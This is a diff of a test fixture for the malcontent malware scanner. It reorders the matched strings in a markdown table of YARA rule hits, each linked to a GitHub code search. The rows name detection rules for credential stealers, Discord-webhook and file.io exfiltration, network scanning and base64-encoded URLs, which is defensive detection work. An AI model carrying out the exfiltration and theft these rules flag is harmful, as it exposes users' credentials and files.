[keychain](https://github.com/search?q=keychain&type=code) | | MEDIUM | [crypto/blockchain](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/blockchain.yara#blockchain) | blockchain | [blockchain](https://github.com/search?q=blockchain&type=code) | | MEDIUM | [crypto/cipher](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext) | mentions 'ciphertext' | [ciphertext](https://github.com/search?q=ciphertext&type=code) | | MEDIUM | [data/compression/xz](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/xz.yara#xz_lib) | uses xz library | [ulikunitz/xz](https://github.com/search?q=ulikunitz%2Fxz&type=code) | -| MEDIUM | [data/embedded/base64_terms](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-terms.yara#contains_base64) | Contains base64 CERTIFICATE | [DRVJUSUZJQ0FUR::$CERTIFICATE](https://github.com/search?q=DRVJUSUZJQ0FUR%3A%3A%24CERTIFICATE&type=code)
[Q0VSVElGSUNBVE::$CERTIFICATE](https://github.com/search?q=Q0VSVElGSUNBVE%3A%3A%24CERTIFICATE&type=code)
[ZGlyZWN0b3J5::$directory](https://github.com/search?q=ZGlyZWN0b3J5%3A%3A%24directory&type=code) | -| MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [aHR0cDovL::$http](https://github.com/search?q=aHR0cDovL%3A%3A%24http&type=code)
[h0dHA6Ly::$http](https://github.com/search?q=h0dHA6Ly%3A%3A%24http&type=code)
[odHRwOi8v::$http](https://github.com/search?q=odHRwOi8v%3A%3A%24http&type=code)
[odHRwczovL::$https](https://github.com/search?q=odHRwczovL%3A%3A%24https&type=code) | -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | +| MEDIUM | [data/embedded/base64_terms](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-terms.yara#contains_base64) | Contains base64 CERTIFICATE | [contains_base64::DRVJUSUZJQ0FUR](https://github.com/search?q=contains_base64%3A%3ADRVJUSUZJQ0FUR&type=code)
[contains_base64::Q0VSVElGSUNBVE](https://github.com/search?q=contains_base64%3A%3AQ0VSVElGSUNBVE&type=code)
[contains_base64::ZGlyZWN0b3J5](https://github.com/search?q=contains_base64%3A%3AZGlyZWN0b3J5&type=code) | +| MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [contains_base64_url::odHRwczovL](https://github.com/search?q=contains_base64_url%3A%3AodHRwczovL&type=code)
[contains_base64_url::aHR0cDovL](https://github.com/search?q=contains_base64_url%3A%3AaHR0cDovL&type=code)
[contains_base64_url::odHRwOi8v](https://github.com/search?q=contains_base64_url%3A%3AodHRwOi8v&type=code)
[contains_base64_url::h0dHA6Ly](https://github.com/search?q=contains_base64_url%3A%3Ah0dHA6Ly&type=code) | +| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)
[[](https://github.com/search?q=%3Chtml%3E&type=code) | | MEDIUM | [data/embedded/pem_private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-pem-private_key.yara#begin_private_key) | Contains RSA PRIVATE KEY directive | [PRIVATE KEY--](https://github.com/search?q=PRIVATE+KEY--&type=code) | | MEDIUM | [data/embedded/ssh_signature](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-ssh-signature.yara#ssh_signature) | Contains embedded SSH signature | [--BEGIN SSH SIGNATURE--](https://github.com/search?q=--BEGIN+SSH+SIGNATURE--&type=code) | | MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
[setgrent](https://github.com/search?q=setgrent&type=code) | | MEDIUM | [discover/ip/public](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/ip/public_ip.yara#iplookup_website) | public service to discover external IP address | [ipify.org](https://github.com/search?q=ipify.org&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code)
[macAddress](https://github.com/search?q=macAddress&type=code) | | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | -| MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code)
[systeminfo](https://github.com/search?q=systeminfo&type=code) | +| MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [systeminfo](https://github.com/search?q=systeminfo&type=code)
[sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | | MEDIUM | [evasion/file/location/var_run](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/slapd/](https://github.com/search?q=%2Fvar%2Frun%2Fslapd%2F&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path) | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.ssh](https://github.com/search?q=%25s%2F.ssh&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecCommand](https://github.com/search?q=ExecCommand&type=code)
[Execute_Command_Line](https://github.com/search?q=Execute_Command_Line&type=code)
[MergeRunCmdOptions](https://github.com/search?q=MergeRunCmdOptions&type=code)
[RunCommandCursor](https://github.com/search?q=RunCommandCursor&type=code)
[StartCmdTrace](https://github.com/search?q=StartCmdTrace&type=code)
[StartCommandOptions](https://github.com/search?q=StartCommandOptions&type=code)
[execTxCommand](https://github.com/search?q=execTxCommand&type=code)
[executeCommand](https://github.com/search?q=executeCommand&type=code)
[processRunCommand](https://github.com/search?q=processRunCommand&type=code)
[runGitCommand](https://github.com/search?q=runGitCommand&type=code)
[runShellCommandAsynchronously](https://github.com/search?q=runShellCommandAsynchronously&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [runShellCommandAsynchronously](https://github.com/search?q=runShellCommandAsynchronously&type=code)
[Execute_Command_Line](https://github.com/search?q=Execute_Command_Line&type=code)
[StartCommandOptions](https://github.com/search?q=StartCommandOptions&type=code)
[MergeRunCmdOptions](https://github.com/search?q=MergeRunCmdOptions&type=code)
[processRunCommand](https://github.com/search?q=processRunCommand&type=code)
[RunCommandCursor](https://github.com/search?q=RunCommandCursor&type=code)
[executeCommand](https://github.com/search?q=executeCommand&type=code)
[StartCmdTrace](https://github.com/search?q=StartCmdTrace&type=code)
[execTxCommand](https://github.com/search?q=execTxCommand&type=code)
[runGitCommand](https://github.com/search?q=runGitCommand&type=code)
[ExecCommand](https://github.com/search?q=ExecCommand&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | | MEDIUM | [exec/script/osa](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/script/osascript.yara#osascript_caller) | runs osascript | [display dialog](https://github.com/search?q=display+dialog&type=code) | | MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | runs powershell scripts | [powershell](https://github.com/search?q=powershell&type=code) | | MEDIUM | [exfil/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/discord.yara#discord_bot) | [Uses the Discord webhooks API](https://github.com/bartblaze/community/blob/3f3997f8c79c3605ae6d5324c8578cb12c452512/data/yara/binaries/indicator_high.yar#L706) | [discord.com/api/webhooks/](https://github.com/search?q=discord.com%2Fapi%2Fwebhooks%2F&type=code) | -| MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docx](https://github.com/search?q=docx&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code) | -| MEDIUM | [exfil/stealer/creds](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/creds.yara#suspected_data_stealer) | suspected data stealer | [Atomic](https://github.com/search?q=Atomic&type=code)
[Binance](https://github.com/search?q=Binance&type=code)
[Chrome](https://github.com/search?q=Chrome&type=code)
[Discord](https://github.com/search?q=Discord&type=code)
[Firefox](https://github.com/search?q=Firefox&type=code)
[History](https://github.com/search?q=History&type=code)
[OpenVPN](https://github.com/search?q=OpenVPN&type=code)
[Snowflake](https://github.com/search?q=Snowflake&type=code)
[Telegram](https://github.com/search?q=Telegram&type=code) | -| MEDIUM | [exfil/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/upload.yara#file_io_uploader) | uploads content to file.io | [POST](https://github.com/search?q=POST&type=code)
[file.io](https://github.com/search?q=file.io&type=code)
[post](https://github.com/search?q=post&type=code) | +| MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docx](https://github.com/search?q=docx&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code) | +| MEDIUM | [exfil/stealer/creds](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/creds.yara#suspected_data_stealer) | suspected data stealer | [Snowflake](https://github.com/search?q=Snowflake&type=code)
[Telegram](https://github.com/search?q=Telegram&type=code)
[Binance](https://github.com/search?q=Binance&type=code)
[Discord](https://github.com/search?q=Discord&type=code)
[Firefox](https://github.com/search?q=Firefox&type=code)
[History](https://github.com/search?q=History&type=code)
[OpenVPN](https://github.com/search?q=OpenVPN&type=code)
[Atomic](https://github.com/search?q=Atomic&type=code)
[Chrome](https://github.com/search?q=Chrome&type=code) | +| MEDIUM | [exfil/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/upload.yara#file_io_uploader) | uploads content to file.io | [file.io](https://github.com/search?q=file.io&type=code)
[POST](https://github.com/search?q=POST&type=code)
[post](https://github.com/search?q=post&type=code) | | MEDIUM | [fs/file/copy](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-copy.yara#file_copy_cp) | copy files using cp | [cp](https://github.com/search?q=cp&type=code) | | MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileProperty](https://github.com/search?q=CreateFileProperty&type=code) | | MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFile](https://github.com/search?q=DeleteFile&type=code) | @@ -61,19 +61,19 @@ | MEDIUM | [fs/proc/self_cgroup](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-cgroup.yara#pid_self_cgroup) | accesses /proc files within own cgroup | [/proc/self/cgroupcpu](https://github.com/search?q=%2Fproc%2Fself%2Fcgroupcpu&type=code) | | MEDIUM | [fs/proc/self_mountinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-mountinfo.yara#proc_self_mountinfo) | gets mount info associated to this process | [/proc/self/mountinfo](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfo&type=code) | | MEDIUM | [impact/ddos](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ddos/ddos.yara#ddos) | References DDoS | [DDoS](https://github.com/search?q=DDoS&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [:CodeWithScopeSpacerheartbeatinterval](https://github.com/search?q=%3ACodeWithScopeSpacerheartbeatinterval&type=code)
[ConnServer heartbeat started](https://github.com/search?q=ConnServer+heartbeat+started&type=code)
[HeartbeatMS](https://github.com/search?q=HeartbeatMS&type=code)
[SetHeartbeatInterval](https://github.com/search?q=SetHeartbeatInterval&type=code)
[WithHeartbeatInterval](https://github.com/search?q=WithHeartbeatInterval&type=code)
[WithHeartbeatTimeout](https://github.com/search?q=WithHeartbeatTimeout&type=code)
[be greater than or equal to the heartbeat interva](https://github.com/search?q=be+greater+than+or+equal+to+the+heartbeat+interva&type=code)
[comWriteDocumentElementheartbeatfrequenc](https://github.com/search?q=comWriteDocumentElementheartbeatfrequenc&type=code)
[comheartbeatMain: re](https://github.com/search?q=comheartbeatMain%3A+re&type=code)
[crc32Rolling backcleanup docsheartbeat_msgeo_d](https://github.com/search?q=crc32Rolling+backcleanup+docsheartbeat_msgeo_d&type=code)
[edConnection pool clearedServer heartbeat failedS](https://github.com/search?q=edConnection+pool+clearedServer+heartbeat+failedS&type=code)
[edclient_sql_exceptionFailed to heartbeat](https://github.com/search?q=edclient_sql_exceptionFailed+to+heartbeat&type=code)
[eerror setting read deadline in heartbeater:](https://github.com/search?q=eerror+setting+read+deadline+in+heartbeater%3A&type=code)
[eonly valid as initial handshakeheartbeat is not](https://github.com/search?q=eonly+valid+as+initial+handshakeheartbeat+is+not&type=code)
[heartbeatCtxCance](https://github.com/search?q=heartbeatCtxCance&type=code)
[heartbeatFrame](https://github.com/search?q=heartbeatFrame&type=code)
[heartbeatInterval](https://github.com/search?q=heartbeatInterval&type=code)
[heartbeatLock](https://github.com/search?q=heartbeatLock&type=code)
[heartbeatTimeout](https://github.com/search?q=heartbeatTimeout&type=code)
[icedisableConsoleLoginfailed to heartbeat](https://github.com/search?q=icedisableConsoleLoginfailed+to+heartbeat&type=code)
[newHeartbeatDuration](https://github.com/search?q=newHeartbeatDuration&type=code)
[orcHeartbeating](https://github.com/search?q=orcHeartbeating&type=code)
[overflow reading version stringHeartbeats should](https://github.com/search?q=overflow+reading+version+stringHeartbeats+should&type=code)
[parquetheartbeat started](https://github.com/search?q=parquetheartbeat+started&type=code)
[parseHeartbeatFrame](https://github.com/search?q=parseHeartbeatFrame&type=code)
[pollHeartbeatTime](https://github.com/search?q=pollHeartbeatTime&type=code)
[publishServerHeartbeatFailedEv](https://github.com/search?q=publishServerHeartbeatFailedEv&type=code)
[publishServerHeartbeatStartedE](https://github.com/search?q=publishServerHeartbeatStartedE&type=code)
[publishServerHeartbeatSucceede](https://github.com/search?q=publishServerHeartbeatSucceede&type=code)
[setupHeartbeatConnecti](https://github.com/search?q=setupHeartbeatConnecti&type=code)
[sha1publickeysubsystemheartbeatwithcoor](https://github.com/search?q=sha1publickeysubsystemheartbeatwithcoor&type=code)
[sheartbeat stopped](https://github.com/search?q=sheartbeat+stopped&type=code)
[startHeartBeat](https://github.com/search?q=startHeartBeat&type=code)
[stopHeartBeat](https://github.com/search?q=stopHeartBeat&type=code)
[swordincludeRetryReasonstopping heartbeat](https://github.com/search?q=swordincludeRetryReasonstopping+heartbeat&type=code)
[tarting server monitoringServer heartbeat succeed](https://github.com/search?q=tarting+server+monitoringServer+heartbeat+succeed&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [be greater than or equal to the heartbeat interva](https://github.com/search?q=be+greater+than+or+equal+to+the+heartbeat+interva&type=code)
[edConnection pool clearedServer heartbeat failedS](https://github.com/search?q=edConnection+pool+clearedServer+heartbeat+failedS&type=code)
[tarting server monitoringServer heartbeat succeed](https://github.com/search?q=tarting+server+monitoringServer+heartbeat+succeed&type=code)
[eonly valid as initial handshakeheartbeat is not](https://github.com/search?q=eonly+valid+as+initial+handshakeheartbeat+is+not&type=code)
[overflow reading version stringHeartbeats should](https://github.com/search?q=overflow+reading+version+stringHeartbeats+should&type=code)
[crc32Rolling backcleanup docsheartbeat_msgeo_d](https://github.com/search?q=crc32Rolling+backcleanup+docsheartbeat_msgeo_d&type=code)
[eerror setting read deadline in heartbeater:](https://github.com/search?q=eerror+setting+read+deadline+in+heartbeater%3A&type=code)
[edclient_sql_exceptionFailed to heartbeat](https://github.com/search?q=edclient_sql_exceptionFailed+to+heartbeat&type=code)
[icedisableConsoleLoginfailed to heartbeat](https://github.com/search?q=icedisableConsoleLoginfailed+to+heartbeat&type=code)
[swordincludeRetryReasonstopping heartbeat](https://github.com/search?q=swordincludeRetryReasonstopping+heartbeat&type=code)
[comWriteDocumentElementheartbeatfrequenc](https://github.com/search?q=comWriteDocumentElementheartbeatfrequenc&type=code)
[sha1publickeysubsystemheartbeatwithcoor](https://github.com/search?q=sha1publickeysubsystemheartbeatwithcoor&type=code)
[:CodeWithScopeSpacerheartbeatinterval](https://github.com/search?q=%3ACodeWithScopeSpacerheartbeatinterval&type=code)
[publishServerHeartbeatFailedEv](https://github.com/search?q=publishServerHeartbeatFailedEv&type=code)
[publishServerHeartbeatStartedE](https://github.com/search?q=publishServerHeartbeatStartedE&type=code)
[publishServerHeartbeatSucceede](https://github.com/search?q=publishServerHeartbeatSucceede&type=code)
[ConnServer heartbeat started](https://github.com/search?q=ConnServer+heartbeat+started&type=code)
[parquetheartbeat started](https://github.com/search?q=parquetheartbeat+started&type=code)
[setupHeartbeatConnecti](https://github.com/search?q=setupHeartbeatConnecti&type=code)
[WithHeartbeatInterval](https://github.com/search?q=WithHeartbeatInterval&type=code)
[SetHeartbeatInterval](https://github.com/search?q=SetHeartbeatInterval&type=code)
[WithHeartbeatTimeout](https://github.com/search?q=WithHeartbeatTimeout&type=code)
[comheartbeatMain: re](https://github.com/search?q=comheartbeatMain%3A+re&type=code)
[newHeartbeatDuration](https://github.com/search?q=newHeartbeatDuration&type=code)
[parseHeartbeatFrame](https://github.com/search?q=parseHeartbeatFrame&type=code)
[sheartbeat stopped](https://github.com/search?q=sheartbeat+stopped&type=code)
[heartbeatCtxCance](https://github.com/search?q=heartbeatCtxCance&type=code)
[heartbeatInterval](https://github.com/search?q=heartbeatInterval&type=code)
[pollHeartbeatTime](https://github.com/search?q=pollHeartbeatTime&type=code)
[heartbeatTimeout](https://github.com/search?q=heartbeatTimeout&type=code)
[orcHeartbeating](https://github.com/search?q=orcHeartbeating&type=code)
[heartbeatFrame](https://github.com/search?q=heartbeatFrame&type=code)
[startHeartBeat](https://github.com/search?q=startHeartBeat&type=code)
[heartbeatLock](https://github.com/search?q=heartbeatLock&type=code)
[stopHeartBeat](https://github.com/search?q=stopHeartBeat&type=code)
[HeartbeatMS](https://github.com/search?q=HeartbeatMS&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[connect](https://github.com/search?q=connect&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[probe](https://github.com/search?q=probe&type=code)
[Port](https://github.com/search?q=Port&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code) | | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | -| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [DoneDownloadCond](https://github.com/search?q=DoneDownloadCond&type=code)
[DownloadArtifactsFile](https://github.com/search?q=DownloadArtifactsFile&type=code)
[DownloadAvatar](https://github.com/search?q=DownloadAvatar&type=code)
[DownloadContentsWithMeta](https://github.com/search?q=DownloadContentsWithMeta&type=code)
[DownloadPackageFile](https://github.com/search?q=DownloadPackageFile&type=code)
[DownloadReleaseAsset](https://github.com/search?q=DownloadReleaseAsset&type=code)
[ExportDownload](https://github.com/search?q=ExportDownload&type=code)
[FTPDownload](https://github.com/search?q=FTPDownload&type=code)
[FailedDownloads](https://github.com/search?q=FailedDownloads&type=code)
[FuncDownloadHelper](https://github.com/search?q=FuncDownloadHelper&type=code)
[GeoIpDownloadStatistics](https://github.com/search?q=GeoIpDownloadStatistics&type=code)
[GetArchiveDownloadURL](https://github.com/search?q=GetArchiveDownloadURL&type=code)
[GetBrowserDownloadURL](https://github.com/search?q=GetBrowserDownloadURL&type=code)
[GetDownloadCount](https://github.com/search?q=GetDownloadCount&type=code)
[GetDownloadLocation](https://github.com/search?q=GetDownloadLocation&type=code)
[GetDownloadURL](https://github.com/search?q=GetDownloadURL&type=code)
[GetDownloadsURL](https://github.com/search?q=GetDownloadsURL&type=code)
[GetHasDownloads](https://github.com/search?q=GetHasDownloads&type=code)
[GetTempDownloadToken](https://github.com/search?q=GetTempDownloadToken&type=code)
[MFA_TOKENdownload start chunk](https://github.com/search?q=MFA_TOKENdownload+start+chunk&type=code)
[NextDownloader](https://github.com/search?q=NextDownloader&type=code)
[NodeInfoIngestDownloader](https://github.com/search?q=NodeInfoIngestDownloader&type=code)
[STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG](https://github.com/search?q=STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG&type=code)
[SuccessfulDownloads](https://github.com/search?q=SuccessfulDownloads&type=code)
[URLDownloadToFile](https://github.com/search?q=URLDownloadToFile&type=code)
[addDownloader](https://github.com/search?q=addDownloader&type=code)
[archive_download_url](https://github.com/search?q=archive_download_url&type=code)
[browser_download_url](https://github.com/search?q=browser_download_url&type=code)
[chunkDownloader](https://github.com/search?q=chunkDownloader&type=code)
[chunk_downloader](https://github.com/search?q=chunk_downloader&type=code)
[downloadChunkHelper](https://github.com/search?q=downloadChunkHelper&type=code)
[downloadH](https://github.com/search?q=downloadH&type=code)
[downloadLocation](https://github.com/search?q=downloadLocation&type=code)
[downloadOCSPCacheServer](https://github.com/search?q=downloadOCSPCacheServer&type=code)
[downloadPatches](https://github.com/search?q=downloadPatches&type=code)
[download_count](https://github.com/search?q=download_count&type=code)
[downloader id](https://github.com/search?q=downloader+id&type=code)
[downloads_url](https://github.com/search?q=downloads_url&type=code)
[downloadsrepos](https://github.com/search?q=downloadsrepos&type=code)
[failed_downloads](https://github.com/search?q=failed_downloads&type=code)
[funcDownloadHelper](https://github.com/search?q=funcDownloadHelper&type=code)
[geoipdownloadstatistics](https://github.com/search?q=geoipdownloadstatistics&type=code)
[getNextChunkDownloader](https://github.com/search?q=getNextChunkDownloader&type=code)
[has_downloads](https://github.com/search?q=has_downloads&type=code)
[methodTotalDownloadTimeshards](https://github.com/search?q=methodTotalDownloadTimeshards&type=code)
[newStreamChunkDownloader](https://github.com/search?q=newStreamChunkDownloader&type=code)
[nodeinfoingestdownloader](https://github.com/search?q=nodeinfoingestdownloader&type=code)
[populateChunkDownloader](https://github.com/search?q=populateChunkDownloader&type=code)
[profileno download link found for](https://github.com/search?q=profileno+download+link+found+for&type=code)
[setNextChunkDownloader](https://github.com/search?q=setNextChunkDownloader&type=code)
[snowflakeChunkDownloader](https://github.com/search?q=snowflakeChunkDownloader&type=code)
[sstart downloading](https://github.com/search?q=sstart+downloading&type=code)
[streamChunkDownloader](https://github.com/search?q=streamChunkDownloader&type=code)
[successful_downloads](https://github.com/search?q=successful_downloads&type=code)
[tailChunkDownloader](https://github.com/search?q=tailChunkDownloader&type=code)
[temp_download_token](https://github.com/search?q=temp_download_token&type=code)
[the scheduleddownloads](https://github.com/search?q=the+scheduleddownloads&type=code)
[theequationsdownload](https://github.com/search?q=theequationsdownload&type=code)
[thresholddownloading error](https://github.com/search?q=thresholddownloading+error&type=code)
[total_download_time](https://github.com/search?q=total_download_time&type=code)
[useStreamDownloader](https://github.com/search?q=useStreamDownloader&type=code)
[vMaxChunkDownloadWorkers](https://github.com/search?q=vMaxChunkDownloadWorkers&type=code)
[vmsdownloading done](https://github.com/search?q=vmsdownloading+done&type=code)
[wcould not download file for scan](https://github.com/search?q=wcould+not+download+file+for+scan&type=code)
[wfailed to download patches](https://github.com/search?q=wfailed+to+download+patches&type=code)
[when trying to download file for scan](https://github.com/search?q=when+trying+to+download+file+for+scan&type=code) | +| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG](https://github.com/search?q=STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG&type=code)
[when trying to download file for scan](https://github.com/search?q=when+trying+to+download+file+for+scan&type=code)
[profileno download link found for](https://github.com/search?q=profileno+download+link+found+for&type=code)
[wcould not download file for scan](https://github.com/search?q=wcould+not+download+file+for+scan&type=code)
[MFA_TOKENdownload start chunk](https://github.com/search?q=MFA_TOKENdownload+start+chunk&type=code)
[methodTotalDownloadTimeshards](https://github.com/search?q=methodTotalDownloadTimeshards&type=code)
[wfailed to download patches](https://github.com/search?q=wfailed+to+download+patches&type=code)
[thresholddownloading error](https://github.com/search?q=thresholddownloading+error&type=code)
[DownloadContentsWithMeta](https://github.com/search?q=DownloadContentsWithMeta&type=code)
[NodeInfoIngestDownloader](https://github.com/search?q=NodeInfoIngestDownloader&type=code)
[newStreamChunkDownloader](https://github.com/search?q=newStreamChunkDownloader&type=code)
[nodeinfoingestdownloader](https://github.com/search?q=nodeinfoingestdownloader&type=code)
[snowflakeChunkDownloader](https://github.com/search?q=snowflakeChunkDownloader&type=code)
[vMaxChunkDownloadWorkers](https://github.com/search?q=vMaxChunkDownloadWorkers&type=code)
[GeoIpDownloadStatistics](https://github.com/search?q=GeoIpDownloadStatistics&type=code)
[downloadOCSPCacheServer](https://github.com/search?q=downloadOCSPCacheServer&type=code)
[geoipdownloadstatistics](https://github.com/search?q=geoipdownloadstatistics&type=code)
[populateChunkDownloader](https://github.com/search?q=populateChunkDownloader&type=code)
[getNextChunkDownloader](https://github.com/search?q=getNextChunkDownloader&type=code)
[setNextChunkDownloader](https://github.com/search?q=setNextChunkDownloader&type=code)
[the scheduleddownloads](https://github.com/search?q=the+scheduleddownloads&type=code)
[DownloadArtifactsFile](https://github.com/search?q=DownloadArtifactsFile&type=code)
[GetArchiveDownloadURL](https://github.com/search?q=GetArchiveDownloadURL&type=code)
[GetBrowserDownloadURL](https://github.com/search?q=GetBrowserDownloadURL&type=code)
[streamChunkDownloader](https://github.com/search?q=streamChunkDownloader&type=code)
[DownloadReleaseAsset](https://github.com/search?q=DownloadReleaseAsset&type=code)
[GetTempDownloadToken](https://github.com/search?q=GetTempDownloadToken&type=code)
[archive_download_url](https://github.com/search?q=archive_download_url&type=code)
[browser_download_url](https://github.com/search?q=browser_download_url&type=code)
[successful_downloads](https://github.com/search?q=successful_downloads&type=code)
[theequationsdownload](https://github.com/search?q=theequationsdownload&type=code)
[DownloadPackageFile](https://github.com/search?q=DownloadPackageFile&type=code)
[GetDownloadLocation](https://github.com/search?q=GetDownloadLocation&type=code)
[SuccessfulDownloads](https://github.com/search?q=SuccessfulDownloads&type=code)
[downloadChunkHelper](https://github.com/search?q=downloadChunkHelper&type=code)
[tailChunkDownloader](https://github.com/search?q=tailChunkDownloader&type=code)
[temp_download_token](https://github.com/search?q=temp_download_token&type=code)
[total_download_time](https://github.com/search?q=total_download_time&type=code)
[useStreamDownloader](https://github.com/search?q=useStreamDownloader&type=code)
[vmsdownloading done](https://github.com/search?q=vmsdownloading+done&type=code)
[FuncDownloadHelper](https://github.com/search?q=FuncDownloadHelper&type=code)
